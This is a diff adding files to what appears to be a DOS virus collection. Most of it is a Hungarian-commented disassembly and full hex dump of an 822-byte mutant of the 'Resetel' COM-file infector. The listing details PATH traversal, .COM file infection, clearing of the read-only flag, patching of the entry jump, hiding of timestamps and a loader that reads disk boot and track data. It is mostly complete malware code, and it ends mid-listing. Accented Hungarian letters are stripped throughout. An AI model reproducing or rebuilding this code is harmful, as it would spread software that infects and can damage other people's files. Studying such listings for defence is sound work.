;[SI+06] dtuma, +0301 ERE_ATTR DW (?) ;[SI+08] attributtuma + +0303 ERE_KEZD DB 3 DUP (?) 
;[SI+0A]
+ ;A file eredeti els 3 byteja.
+
+ ;A kvetkez 3 byteon lesz az a 3 byte , amit a vrus egy meg-
+ ;fertzend file elejre fog rni.
+
+0306 B_JMP DB E9 ;[SI+0D]
+ ;JMP gpikdja
+0307 CIM_JMP DW (?) ;Eltols (JMP operandusa)
+
+0309 KERES_STR DB '*.COM',0 ;[SI+10]
+ ;Ezt a stringet msolja a
+ ;FILE_NEV_MUT cmre
+
+030F PATH_MUT DW (?) ;[SI+16]
+ ;Hol a kvetkez aldirectory neve
+ ;az environmenten.
+
+0311 FILE_NEV_MUT DW (?) ;[SI+18]
+ ;Az tmsolt aldirectory mg mu-
+ ;tat.
+ ;Azt mutatja , hogy hova kell a
+ ;keressi stringet(*.COM), majd a
+ ;file nevt msolni a FILE_PATH-
+ ;on bell ahhoz, hogy teljes utat
+ ;kapjunk.
+
+0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
+ ;environment terleten.
+
+0318 FILE_PATH DB 40 DUP (?);[SI+1F]
+ ;Itt lesz majd a keressi string
+ ;s a fertzend file neve ttal
+ ;egytt.
+
+
+ ;Ide mutat a DTA. Ezt a terletet fogja a DOS a file adataival
+ ;feltlteni.
+
+0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
+036D ENT_ATTR DB (?) ;Attributtum [SI+74]
+036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75]
+0370 ENT_DATUM DW (?) ;Keletkezs dtuma [SI+77]
+0372 ENT_HOSSZ DW (?) ;Als sz [SI+79]
+0374 DW (?) ;Fels sz [SI+7B]
+0376 ENT_NEV DB 0D DUP (?);Megtallt file neve [SI+7D]
+
+0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
+ ;Nem hasznlja
+
+ ;----------------------------------------------------
+ ; A Tltgett behz rsz
+ ;----------------------------------------------------
+
+
+0388 50 PUSH AX ;Regiszterek elmentse
+0389 53 PUSH BX
+038A 51 PUSH CX
+038B 52 PUSH DX
+038C 06 PUSH ES
+038D 1E PUSH DS
+038E 57 PUSH DI
+038F 56 PUSH SI
+0390 E80000 CALL 0393 ;Lebuks !! (/g)
+0393 5B POP BX ;BX=0393
+
+ ;A: BOOT beolvassa/Tltget lekrdezse
+
+0394 BEA55A MOV SI,5AA5 ;Tltget lekrdezse
+0397 BFAA55 MOV DI,55AA
+039A 0E PUSH CS
+039B 07 POP ES
+039C 81C3E803 ADD BX,03E8 ;BX=077B
+03A0 81FBE803 CMP BX,03E8
+03A4 7303 JNB 03A9
+03A6 E98200 JMP 042B ;Ha nincs elg szabad memria a szegmensen
+03A9 53 PUSH BX
+03AA B80102 MOV AX,0201 ;A:BOOT beolvassa
+03AD BA0000 MOV DX,0000
+03B0 B90100 MOV CX,0001
+03B3 CD13 INT 13
+03B5 5B POP BX
+03B6 7308 JNB 03C0
+03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
+03BB 74EC JZ 03A9
+03BD EB6C JMP 042B ;Valdi hiba->vge
+03BF 90 NOP
+03C0 81FE5AA5 CMP SI,A55A
+03C4 7465 JZ 042B ;Vge, ha a Tltget mr a memriban van
+
+ ;Van-e elg szabad memria a Tltget beolvasshoz
+
+03C6 8CC8 MOV AX,CS
+03C8 050010 ADD AX,1000
+03CB 53 PUSH BX
+03CC 50 PUSH AX
+03CD CD12 INT 12 ;Max mem.
+03CF BB4000 MOV BX,0040
+03D2 F7E3 MUL BX ;AX-ben a memria tetejnek szegmense
+03D4 2D0010 SUB AX,1000 ;legalbb 4Kb kell a Tltgetnek
+03D7 8BD8 MOV BX,AX
+03D9 58 POP AX ;CS+1000
+03DA 3BD8 CMP BX,AX
+03DC 7304 JNB 03E2
+03DE 5B POP BX
+03DF EB4A JMP 042B ;Vge, ha nincs elg szabad memria
+03E1 90 NOP
+
+ ; A lemez utls svjnak megkeresse
+
+03E2 5B POP BX ;BX=077B
+03E3 8EC0 MOV ES,AX ;Max mem-1000
+03E5 2E CS:
+03E6 8B4718 MOV AX,[BX+18] ;Sv hossza
+03E9 2E CS:
+03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak szma
+03ED F7E1 MUL CX
+03EF 8BC8 MOV CX,AX ;Egy cilinder nagysga
+03F1 2E CS:
+03F2 8B4713 MOV AX,[BX+13] ;Szektorok szma
+03F5 BA0000 MOV DX,0000
+03F8 F7F1 DIV CX ;Osztva a cilinder nagysgval AL-ben a sv
+
+ ; Az utls sv beolvassa
+
+03FA 81EBE803 SUB BX,03E8 ;BX=0393
+03FE 53 PUSH BX
+03FF 8AE8 MOV CH,AL ;40/80-dik sv
+0401 B101 MOV CL,01
+0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
+0406 BA0000 MOV DX,0000
+0409 B80802 MOV AX,0208 ;8 szektor beolvassa
+040C CD13 INT 13
+040E 5B POP BX
+040F 721A JB 042B ;Hibnl vge
+
+ ; Ha a Tltgett tall, elindtja
+
+0411 53 PUSH BX
+0412 BB0001 MOV BX,0100
+0415 26 ES:
+0416 8B07 MOV AX,[BX]
+0418 3D5224 CMP AX,2452 ;Azonost
+041B 5B POP BX
+041C 750D JNZ 042B ;Ha nem Tltget
+041E 8BC3 MOV AX,BX
+0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat)
+0423 0E PUSH CS
+0424 50 PUSH AX
+0425 B80A01 MOV AX,010A ;Tltget belpsi pontja
+0428 06 PUSH ES
+0429 50 PUSH AX
+042A CB RETF
+
+ ; Visszatrs
+
+042B 5E POP SI ;Regiszterek vissza
+042C 5F POP DI
+042D 1F POP DS
+042E 07 POP ES
+042F 5A POP DX
+0430 59 POP CX
+0431 5B POP BX
+0432 58 POP AX
+0433 C3 RET
+0434 0000 DW 0000 ;???
+
+
+ A vrus hexa dumpja :
+
+
+0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
+0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
+0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
+0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
+0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
+0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
+0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
+0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
+0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
+0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
+01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
+01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
+01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
+01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
+01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
+01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
+0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
+0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
+0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
+0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
+0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
+0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
+0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
+0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
+0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
+0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
+02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
+02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
+02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
+02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
+02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
+02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
+0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
+0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
+0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
+0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
+0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
+0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
+0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
+0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
+0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
+0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
+03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
+03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
+03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
+03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
+03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
+03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
+0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
+0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
+0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
+0430 59 5B 58 C3 00 00 Y[X...
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.v_822.lst b/MSDOS/Virus.MSDOS.Unknown.v_822.lst
new file mode 100644
index 00000000..381cc2c0
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.v_822.lst
@@ -0,0 +1,669 @@
+
+
+ A Resetel vrus Tltget fle mutnsa
+ ***************************************
+
+
+A Resetel vrussal teljes egszben megegyezik a fertz mechanizmus.
+Eltekintve attl, hogy ez a mutns nem tesz tnkre fjlokat. Az adatterlet is
+ugyanazon a cmen van, gy ugyangy lehet rtani, mint a Resetelt. A vltozs:
+a vrus hossza 822 byte, minden indts utn az A:-rl megprblja beolvasni a
+BOOT-ot, majd a 40/80-dik svot. Ha valamelyik Tltgetvel fertztt, akkor
+elindtja a Tltgett !
+
+
+ ;Ide (0100-ra) mutat a file elejrl az ugr utasts.
+
+ ;Els feladat: az els 3 byte visszarsa az eredetire.
+
+0100 51 PUSH CX ;CX a stacken marad mindvgig.
+ ;A kvetkez utasts operandust ( jelen esetben 02F9-et )
+ ;fertzskor lltja be , gy mindig a helyes cmre mutat.
+0101 BAF902 MOV DX,02F9 ;Eredeti els 3 byte cme-10h
+0104 FC CLD ;( ERE_DTA_OFS)
+0105 8BF2 MOV SI,DX
+0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
+010B BF0001 MOV DI,0100 ;Program eleje
+010E B90300 MOV CX,0003 ;3 byte
+0111 F3 REPZ
+0112 A4 MOVSB ;Az eredeti byteok visszalltsa
+
+
+ ;-----------------------------------------
+ ; Installcis rsz:
+ ;-----------------------------------------
+
+ ;DOS verzi lekrdezse. 1.00-nl kisebb verzinl az eredeti
+ ;program futtatsa: ekkor a vrus nem mkdik.
+
+0113 8BF2 MOV SI,DX ;Ezutn SI-ben az adatterlet cme
+0115 B430 MOV AH,30
+0117 CD21 INT 21 ;DOS verzi lekrdezse
+0119 3C00 CMP AL,00 ;Csak 1.00-nl kisebbnl lp ki
+011B 7503 JNZ 0120
+011D E9C701 JMP 02E7 ;Eredeti program futtatsa
+
+
+ ;Disk Transzfer Address lekrdezse, elmentse
+
+0120 06 PUSH ES
+0121 B42F MOV AH,2F
+0123 CD21 INT 21 ;DTA leolvassa (ES:BX), megrzse
+0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
+0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
+
+ ;-------------------------------------------------------
+ ; A beiktatott behz rsz
+ ;-------------------------------------------------------
+
+012D E85802 CALL 0388
+0130 07 POP ES
+
+ ;DTA belltsa ENTRY cmre (0358). Igy a FindFirst, FindNext
+ ;DOS funkcik ide fogjk msolni a file adatait (nevt,idejt,
+ ;hosszt,stb).
+
+0131 BA5F00 MOV DX,005F
+ ;{Valsznleg rgi assemblerrel rtk a vrust, ezrt van itt
+ ;egy NOP utasts.}
+0134 90 NOP
+0135 03D6 ADD DX,SI
+0137 B41A MOV AH,1A
+0139 CD21 INT 21 ;DTA lltsa DS:DX-re: ENTRY(0358)
+
+
+ ;A PATH-ok cmnek megkeresse. Ha az aktulis knyvtrban mr
+ ;mindegyik filet megfertzte , itt tajlja meg azoknak az al-
+ ;knyvtraknak a nevt , amelyekben mg megfertzend fileokat
+ ;tallhat.
+
+013B 06 PUSH ES
+013C 56 PUSH SI
+013D 8E062C00 MOV ES,[002C];Environment (krnyezet) segmense
+0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel helyre
+ ;(a kvetkez directoryra) mutatni
+
+
+ ;A kvetkez rsz a PATH= szveget keresi meg az environment
+ ;terleten:
+
+0144 5E POP SI
+0145 56 PUSH SI
+0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
+014A AC LODSB ;AL=DS:[SI],SI++
+014B B90080 MOV CX,8000 ;max 32k az environment
+014E F2 REPNZ
+014F AE SCASB ;AL-ES:[DI] Megkeresi a kvetkez
+ ;'P' bett
+0150 B90400 MOV CX,0004 ;Mg 4 bet azonostsa
+0153 AC LODSB ;AL=DS:[SI],SI++
+0154 AE SCASB ;AL-ES:[DI],DI++
+0155 75ED JNZ 0144 ;Ugrs, ha a kvetkez 4 bet nem
+ ;egyezik (nem 'ATH=')
+0157 E2FA LOOP 0153
+0159 5E POP SI ;ES:DI mutat az els PATH-ra
+015A 07 POP ES
+015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
+
+
+015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ksbb gyis
+0161 81C71F00 ADD DI,001F ;fellrja} FILE_PATH (0318)
+0165 8BDE MOV BX,SI ;Ezutn BX mutat az adatokra
+0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
+016B 8BFE MOV DI,SI ;{Az elbb mr bellitotta (?)}
+016D EB3A JMP 01A9
+
+
+ ;A kvetkez PATH-ban megadott aldirectoryt FILE_PATH-ra m-
+ ;solja. Igy a kvetkez fileokat mr ebben az aldirectoryban
+ ;fogja keresni.
+
+016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
+0174 7503 JNZ 0179
+0176 E96001 JMP 02D9 ;Ugrs, ha nincs tbb PATH aldir.
+ ;(mindet megfertte mr)
+0179 1E PUSH DS
+017A 56 PUSH SI
+017B 26 ES:
+017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
+0180 8BFE MOV DI,SI ;(02F9)
+0182 26 ES:
+0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
+0187 81C71F00 ADD DI,001F ;FILE_PATH cme (0318)
+018B AC LODSB ;AL=DS:[SI] SI++
+018C 3C3B CMP AL,3B ;';'
+018E 740A JZ 019A
+0190 3C00 CMP AL,00
+0192 7403 JZ 0197
+0194 AA STOSB ;ES:[DI]:=AL DI++
+0195 EBF4 JMP 018B ;tmsols ';' vagy #0-ig
+
+ ;#0-val zrult a PATH bejegyzs => nem lesz tbb
+0197 BE0000 MOV SI,0000
+019A 5B POP BX ;Ezutn BX mutat az adatokra
+019B 1F POP DS
+019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
+ ;( Nincs tbb PATH jelzs )
+
+ ;A kvetkez PATH-ban adott aldir. mr tmsolva.
+01A0 807DFF5C CMP BYTE PTR [DI-01],5C
+01A4 7403 JZ 01A6 ;Ugrs, ha az utls bet a '\'
+01A6 B05C MOV AL,5C ;Egybknt '\' rs
+01A8 AA STOSB ;ES:[DI]:=AL DI++
+
+
+
+
+ ;Egy aldirectory kirtkelse . Elszr az aktulis , majd a
+ ;FILE_PATH -ra msolt aldirectory vgignzse, fertzs.
+ ;DI a FILE_PATH-ba rt aldirectory neve utni pozicira mutat.
+
+
+ ;A COM kiterjeszts fileok megkeresse:
+
+01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
+ ;Ide kell majd a file nevt
+ ;msolni (az aldir. neve utn)
+01AD 8BF3 MOV SI,BX ;(02F9)
+01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
+01B3 B90600 MOV CX,0006 ;6 bet tmsolsa ('*.COM',0)
+01B6 F3 REPZ ;A PATH-ban megadott aldirectory
+01B7 A4 MOVSB ;mg , gy teljes keressi utunk
+ ;lesz
+01B8 8BF3 MOV SI,BX ;(02F9)
+01BA B44E MOV AH,4E ;FIND FIRST ENTRY
+01BC BA1F00 MOV DX,001F
+01BF 90 NOP
+01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
+01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
+01C5 CD21 INT 21 ;Az els COM kiterjeszts file
+ ;megkeresse . A file adatait a DTA
+ ;ltal mutatott cmre (ENTRY 0358)
+ ;msolja.
+01C7 EB04 JMP 01CD
+
+
+ ;Kvetkez COM file keresse (adatai ENTRY-re kerlnek).
+
+01C9 B44F MOV AH,4F ;FIND NEXT
+01CB CD21 INT 21
+01CD 7302 JNB 01D1
+01CF EB9E JMP 016F ;Ha nem tall tbb COM filet : j
+ ;aldirt keres a PATH-ban
+
+
+ ;Mr tallt COM filet. Adataival az ENTRY fel van tltve.Ennek
+ ;a filenak az ellenrzse, fertzse kvetkezik.
+
+ ;Annak ellenrzse , hogy a file megfertzhet-e (fertztt-e,
+ ;tl hossz-e, tl rvid-e) . Ha nem fertzhet visszaugrik j
+ ;fileokat keresni.
+
+01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
+01D5 241F AND AL,1F
+01D7 3C1F CMP AL,1F ;Ugrs, ha az als 5 bit 1-es:
+01D9 74EE JZ 01C9 ;a file mr fertztt.
+01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
+01E1 77E6 JA 01C9 ;Ugrs, ha file hossza nagyobb,mint
+ ;64000h (mr nem fr bele a vrus)
+01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
+01E8 72DF JB 01C9 ;Ugrs, ha rvidebb 10h bytenl
+
+
+ ;-----------------------------------------
+ ; Megvan a kivlaszott file.
+ ;-----------------------------------------
+
+ ;A file nevt az aldirectory neve utn kell msolni , hogy a
+ ;teljes t rendelkezsnkre lljon , gy majd meg tudja nyitni
+ ;a filet.
+01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
+01EE 56 PUSH SI ;a file nevt msolni
+01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
+
+01F3 AC LODSB ;AL:=DS:[SI] SI++
+01F4 AA STOSB ;ES:[DI]:=AL DI++ (Msols)
+01F5 3C00 CMP AL,00 ;Nvlezr 0-ig msol
+01F7 75FA JNZ 01F3
+01F9 5E POP SI ;SI jra az adatokra mutat
+
+
+ ;A file egyes eredeti informciinak megrzse , hogy a fert-
+ ;zs ne tnjn fel.
+
+ ;Az eredeti attributtum megrzse:
+
+ ;{Fogalmam sincs mirt kell a file attributtumt mg egyszer
+ ;lekrdezni , amikor az ENTRY terleten megtallhat . Taln a
+ ;vrus rja nem tudta?}
+01FA B80043 MOV AX,4300 ;File attributtumnak lekrdezse
+01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
+0200 90 NOP ;{piszok}
+0201 03D6 ADD DX,SI ;DS:DX mutat a file tjra
+0203 CD21 INT 21 ;CX-ben az attributtum
+0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
+
+
+ ;A file rsvdelmnek trlse:
+
+0209 B80143 MOV AX,4301 ;File attributtumnak llitsa
+020C 81E1FEFF AND CX,FFFE ;Read Only jelzs trlse
+0210 BA1F00 MOV DX,001F ;{ Az elbb mr belltotta, minek
+0213 90 NOP ;jra? }
+0214 03D6 ADD DX,SI ;FILE_PATH (0318)
+0216 CD21 INT 21
+
+
+ ;File megnyitsa:
+
+0218 B8023D MOV AX,3D02 ;File megnyitsa rsra, olvassra
+021B BA1F00 MOV DX,001F ;{Mg egyszer belltja!}
+021E 90 NOP ;{piszok}
+021F 03D6 ADD DX,SI ;FILE_PATH (0318)
+0221 CD21 INT 21
+0223 7303 JNB 0228
+0225 E9A200 JMP 02CA ;Hibnl: nincs fertzs
+0228 8BD8 MOV BX,AX ;Handle
+
+
+ ;A file eredeti (mostani) idejnek lekrdezse:
+
+ ;{Ez is megtallhat lenne az ENTRY terleten!}
+022A B80057 MOV AX,5700 ;Get Date & Time
+022D CD21 INT 21
+022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
+0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
+
+
+ ;Annak eldntse , hogy a kivlasztott filet tnkretegye-e ,
+ ;vagy megfertzze . Lekrdezi a jelenlegi idt , s ha msod-
+ ;perceinek szma 8-cal oszthat , akkor a filet resetelv te-
+ ;szi, egybknt pedig megfertzi. Igy az esetek 2/15-d rsz-
+ ;ben teszi csak tnkre a filet.
+
+0237 B42C MOV AH,2C ;A mostani id lekrdezse
+0239 CD21 INT 21
+023B 80E607 AND DH,07 ;A msodpercek als 3 bitje
+023E EB0D JMP 024D ;Fertzs
+0240 90 NOP
+
+
+ ; Szemt a Reseletlbl
+
+0241 B440 MOV AH,40
+0243 B90500 MOV CX,0005
+0246 8BD6 MOV DX,SI
+0248 81C28A00 ADD DX,008A
+024C 90 NOP
+
+ ;-----------------------------------------
+ ; Fertzs:
+ ;-----------------------------------------
+
+
+ ;Az eredeti file els 3 bytejnak megrzse , hogy ksbb mg
+ ;futtatni lehessen.
+024D B43F MOV AH,3F ;Olvass filebl
+024F B90300 MOV CX,0003 ;Az els 3 byte beolvassa
+0252 BA0A00 MOV DX,000A
+0255 90 NOP ;{piszok}
+0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
+0258 CD21 INT 21
+025A 7255 JB 02B1 ;Hibnl vge
+025C 3D0300 CMP AX,0003
+025F 7550 JNZ 02B1 ;Hibnl vge
+
+
+ ;File vgre lls, az j cmek kiszmtsa:
+
+0261 B80242 MOV AX,4202 ;File Pointer file vgre lltsa
+0264 B90000 MOV CX,0000
+0267 BA0000 MOV DX,0000
+026A CD21 INT 21
+026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
+
+
+ ;A file elejre irand JMP operandusnak kiszmtsa:
+
+026E 8BC8 MOV CX,AX ;AX-ben a file hossza
+0270 2D0300 SUB AX,0003 ;AX-ben az eltols a JMP utasts-
+ ;hoz, ahhoz amit a file elejre fog
+ ;majd rni . Igy ez a JMP a file
+ ;mostani vge utni bytera fog mu-
+ ;tatni.
+0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
+
+
+ ;Az j fileon belli adatterlet cmnek kiszmtsa s bel-
+ ;ltsa:
+
+0277 81C1F902 ADD CX,02F9 ;CX az j fileon belli adatter-
+027B 8BFE MOV DI,SI ;letre mutat.
+027D 81EFF701 SUB DI,01F7 ;A vrus els utastsnak (MOV DX,
+ ;02F9) operandusnak cme.
+0281 890D MOV [DI],CX ;Ide rja az adatterlet cmt
+
+
+ ;-----------------------------------------
+ ; A vrus hozzmsolja magt a filehoz:
+ ;-----------------------------------------
+
+ ;(A filemutat a file vgre mutat.)
+0283 B440 MOV AH,40 ;Irs fileba.
+0285 B93603 MOV CX,0336 ;822 byte (a vrus hossza)
+0288 8BD6 MOV DX,SI
+028A 81EAF901 SUB DX,01F9 ;DX a vrus els bytejra mutat
+028E CD21 INT 21
+0290 721F JB 02B1 ;Hibnl vge
+0292 3D3603 CMP AX,0336
+0295 751A JNZ 02B1 ;Ha nem rta ki mind a 648 byteot
+
+
+ ;Az els 3 byte tlltsa, egy a file vgre mutat ugr uta-
+ ;stsra:
+
+0297 B80042 MOV AX,4200 ;A file pointer a file elejre!
+029A B90000 MOV CX,0000
+029D BA0000 MOV DX,0000
+02A0 CD21 INT 21
+02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
+
+02A4 B440 MOV AH,40 ;Irs fileba
+02A6 B90300 MOV CX,0003 ;3 byte
+02A9 8BD6 MOV DX,SI
+02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr utastsra
+02AF CD21 INT 21 ;mutat
+
+
+ ;Az eredeti id ( mr a fertzsjelzssel egytt ) visszall-
+ ;tsa:
+
+02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
+02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
+02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
+02BD 81C91F00 OR CX,001F ;Mr volt fertzve jelzs
+02C1 B80157 MOV AX,5701 ;Set Date & Time
+02C4 CD21 INT 21
+
+
+ ;A file lezrsa:
+
+02C6 B43E MOV AH,3E ;Close Handle
+02C8 CD21 INT 21
+
+
+ ;Az eredeti attributtum visszalltsa:
+
+02CA B80143 MOV AX,4301 ;Set File Attributtum
+02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
+02D1 BA1F00 MOV DX,001F
+02D4 90 NOP
+02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
+02D7 CD21 INT 21
+
+
+ ;DTA visszalltsa az eredeti cmre:
+
+02D9 1E PUSH DS
+02DA B41A MOV AH,1A ;Set DTA
+02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
+02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
+02E4 CD21 INT 21
+02E6 1F POP DS
+
+
+ ;-----------------------------------------
+ ; Az eredeti program futtatsa:
+ ;-----------------------------------------
+
+02E7 59 POP CX ;CX visszalltsa
+02E8 33C0 XOR AX,AX ;Regiszterek nullzsa
+02EA 33DB XOR BX,BX
+02EC 33D2 XOR DX,DX
+02EE 33F6 XOR SI,SI
+02F0 BF0001 MOV DI,0100
+02F3 57 PUSH DI ;0100 a stackre
+02F4 33FF XOR DI,DI
+02F6 C2FFFF RET FFFF ;100-on folytatdik a vezrls
+ ;SP-- {Hogy minek?}
+
+
+
+ ;-----------------------------------------
+ ; ADAT TERLET
+ ;-----------------------------------------
+
+
+ ;Ide mutat (02F9-re) a vrus elejn DX, ksbb SI,BX.
+
+02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cme
+02FB ERE_DTA_SEG DW (?) ;[SI+02]
+
+02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
+02FF ERE_DATE DW (?) ;[SI+06] dtuma,
+0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
+
+0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
+ ;A file eredeti els 3 byteja.
+
+ ;A kvetkez 3 byteon lesz az a 3 byte , amit a vrus egy meg-
+ ;fertzend file elejre fog rni.
+
+0306 B_JMP DB E9 ;[SI+0D]
+ ;JMP gpikdja
+0307 CIM_JMP DW (?) ;Eltols (JMP operandusa)
+
+0309 KERES_STR DB '*.COM',0 ;[SI+10]
+ ;Ezt a stringet msolja a
+ ;FILE_NEV_MUT cmre
+
+030F PATH_MUT DW (?) ;[SI+16]
+ ;Hol a kvetkez aldirectory neve
+ ;az environmenten.
+
+0311 FILE_NEV_MUT DW (?) ;[SI+18]
+ ;Az tmsolt aldirectory mg mu-
+ ;tat.
+ ;Azt mutatja , hogy hova kell a
+ ;keressi stringet(*.COM), majd a
+ ;file nevt msolni a FILE_PATH-
+ ;on bell ahhoz, hogy teljes utat
+ ;kapjunk.
+
+0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
+ ;environment terleten.
+
+0318 FILE_PATH DB 40 DUP (?);[SI+1F]
+ ;Itt lesz majd a keressi string
